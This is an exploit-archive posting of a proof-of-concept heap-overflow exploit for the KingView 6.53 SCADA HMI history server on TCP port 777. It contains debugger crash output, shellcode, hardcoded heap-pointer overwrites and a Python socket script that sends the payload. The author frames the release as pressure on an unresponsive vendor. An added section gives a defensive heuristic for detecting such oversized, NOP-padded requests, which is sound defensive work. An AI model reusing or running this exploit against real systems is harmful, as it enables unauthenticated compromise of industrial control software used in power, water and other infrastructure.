
KingView 6.53 SCADA HMI Heap Overflow

Posted Jan 10, 2011
Authored by Dillon Beresford

KingView version 6.53 SCADA HMI heap overflow proof of concept exploit.

tags | exploit, overflow, proof of concept
SHA-256 | 756238865e761c8e5c2055ba2ba802745cf3ac23518d9635de69403c333d7b1a

## Exploit Title: KingView 6.53 SCADA HMI Heap Overflow PoC
## Date: 9/28/2010
## Author: Dillon Beresford
## Software Link: http://download.kingview.com/software/kingview%20English%20Version/kingview6.53_EN.rar
## Version: 6.53 (English)
## Tested on: Windows XP SP1 (works on SP2 and SP3); will release new targets after the CERT advisory is public.

## Shouts to HD Moore, JDuck, Egyp7, todb, |)ruid, nate and the rest of the AHA! crew.
## Thanks to all who share knowledge about heap smashing and heap bypass techniques.

## Notified CERT and the vendor, CERT notified the vendor as well, vendor never responded.
## No patch or response from vendor as of 1/9/2011
## Let's get this into the wild and see how long it takes them to respond.

## Looks like persistence pays off. :-)

## SP2/SP3 targets will be available soon. (Putting it into Metasploit; this is just a PoC to get a response from the vendor.)
## Vendor: Beijing WellinControl Technology Development Co.,Ltd
## http://www.wellintek.com

## Beijing WellinControl Technology Development and CHINA CERT were notified on Tue, Sep 28, 2010 at 6:31 AM
## I have made every attempt and yet they choose to ignore...
## This PoC should wake up the dragon. >:-]
## With more to come!

## KingView software is a high-performance product which can be used to build a data information
## service platform in the automation field. KingView software can provide graphic visualization which takes
## your operations management, control and optimization. KingView is widely used in power,
## water conservancy, buildings, coal mines, environmental protection, metallurgy and so on.
## And now KingView software is used in national defense and aerospace in China.

## Notes: The HistorySrv process listens on TCP port 777
## This process does not require any authentication from clients

## An attacker could replace the Flink and Blink pointers with evil ones.. Herrow sweeping dragon.

## Windows XP SP1 (x86)
## CommandLine: "C:\Program Files\Kingview\HistorySvr.exe"
## eax=00241eb4 ebx=7ffdf000 ecx=00000003 edx=77f6eb08 esi=00241eb4 edi=00241f48
## eip=77f767cd esp=0012fb38 ebp=0012fc2c iopl=0 nv up ei pl nz na po nc
## cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202
## ntdll!DbgBreakPoint:
## 77f767cd cc int 3
## 0:000> g
## ModLoad: 71950000 71a34000 C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.10.0_x-ww_f7fb5805\comctl32.dll
## ModLoad: 5ad70000 5ada4000 C:\WINDOWS\System32\uxtheme.dll
## ModLoad: 71a50000 71a8b000 C:\WINDOWS\system32\mswsock.dll
## ModLoad: 71a90000 71a98000 C:\WINDOWS\System32\wshtcpip.dll
## (318.6d4): Access violation - code c0000005 (first chance)
## First chance exceptions are reported before any exception handling.
## This exception may be expected and handled.
## eax=42424242 ebx=00000285 ecx=44444444 edx=00d38110 esi=00d38110 edi=003a0000
## eip=77f6256f esp=0012f36c ebp=0012f584 iopl=0 nv up ei pl zr na pe nc
## cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00010246
## ntdll!RtlAllocateHeapSlowly+0x6bd:
## 77f6256f 8901 mov dword ptr [ecx],eax ds:0023:44444444=????????
## 0:000> u
## ntdll!RtlAllocateHeapSlowly+0x6bd:
## 77f6256f 8901 mov dword ptr [ecx],eax
## 77f62571 894804 mov dword ptr [eax+4],ecx
## 77f62574 3bc1 cmp eax,ecx
## 77f62576 7534 jne ntdll!RtlAllocateHeapSlowly+0x6fa (77f625ac)
## 77f62578 668b06 mov ax,word ptr [esi]
## 77f6257b 663d8000 cmp ax,80h
## 77f6257f 732b jae ntdll!RtlAllocateHeapSlowly+0x6fa (77f625ac)
## 77f62581 0fb7c8 movzx ecx,ax


## Usage: python exploit.py 127.0.0.1 777

import os
import socket
import sys

host = sys.argv[1]
port = int(sys.argv[2])

print " KingView 6.53 SCADA HMI Heap Smashing Exploit "
print " Credits: D1N | twitter.com/D1N "

shellcode = ("\x33\xC0\x50\x68\x63\x61\x6C\x63\x54\x5B\x50\x53\xB9"
"\x44\x80\xc2\x77"
"\xFF\xD1\x90\x90")

exploit = ("\x90" * 1024 + "\x44" * 31788)
exploit += ("\xeb\x14") # our JMP (over the junk and into nops)
exploit += ("\x44" * 6)
exploit += ("\xad\xbb\xc3\x77") # ECX 0x77C3BBAD --> call dword ptr ds:[EDI+74]
exploit += ("\xb4\x73\xed\x77") # EAX 0x77ED73B4 --> UnhandledExceptionFilter()
exploit += ("\x90" * 21)
exploit += shellcode

print " [+] Herrow Sweeping Dragon..."
print " [+] Sending payload..."

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host,port))
s.send(exploit)
data = s.recv(1024)

print " [+] Closing connection.."
s.close()
print " [+] Done!"
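
The PoC header notes that HistorySvr accepts unauthenticated input on TCP 777 and that the crash is a heap-management write (Flink/Blink corruption) reached by sending one oversized request. As an added example, not part of the original PoC or of the vendor's code, here is a simple monitoring heuristic a defender could run over captured payloads destined for that port: it flags requests far larger than a sane history query and long runs of a single repeated byte (filler or a NOP sled), the two properties the PoC's payload layout exhibits. The size threshold and minimum run length are assumptions chosen for illustration, and the sample payload is constructed and contains only filler bytes.

```python
import re
from typing import Dict, List, Tuple

# Heuristic parameters (assumptions for illustration, not vendor-documented values).
HISTORYSVR_PORT = 777        # the PoC header says HistorySvr listens here, unauthenticated
MAX_SANE_REQUEST = 4096      # anything larger sent to that port deserves a look
MIN_FILLER_RUN = 512         # a run of one repeated byte this long looks like filler or a sled
NOP = 0x90

# Matches a single byte followed by at least MIN_FILLER_RUN-1 copies of itself.
_RUN_RE = re.compile(rb"(.)\1{%d,}" % (MIN_FILLER_RUN - 1), re.DOTALL)

def byte_runs(payload: bytes) -> List[Tuple[int, int, int]]:
    """Return (byte_value, run_length, offset) for every long repeated-byte run."""
    return [(m.group(1)[0], len(m.group(0)), m.start()) for m in _RUN_RE.finditer(payload)]

def inspect_historysvr_request(dst_port: int, payload: bytes) -> Dict[str, object]:
    """Score one TCP payload headed for HistorySvr; returns a verdict plus the reasons."""
    findings: List[str] = []
    if dst_port != HISTORYSVR_PORT:
        return {"suspicious": False, "findings": findings}
    if len(payload) > MAX_SANE_REQUEST:
        findings.append("oversized request: %d bytes" % len(payload))
    runs = byte_runs(payload)
    for value, length, offset in runs:
        findings.append("run of 0x%02x x %d at offset %d" % (value, length, offset))
    if any(value == NOP for value, _, _ in runs):
        findings.append("NOP sled present")
    return {"suspicious": bool(findings), "findings": findings}

# Constructed samples: a short benign-looking request, and a payload with the same
# shape as the PoC (1024 NOPs then 31788 filler bytes) but no shellcode or pointers.
BENIGN_REQUEST = b"HIST\x00\x01" + b"\x00" * 16
SYNTHETIC_OVERFLOW = b"\x90" * 1024 + b"\x44" * 31788 + b"\x00" * 32

if __name__ == "__main__":
    for name, data in (("benign", BENIGN_REQUEST), ("synthetic", SYNTHETIC_OVERFLOW)):
        verdict = inspect_historysvr_request(HISTORYSVR_PORT, data)
        print(name, verdict["suspicious"], *verdict["findings"], sep="\n  ")
```

Feeding the function from a packet capture (for example, reassembled TCP payloads to port 777) turns it into a crude IDS signature for this class of request; the same check could be expressed as a Snort/Suricata content rule with a size condition.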

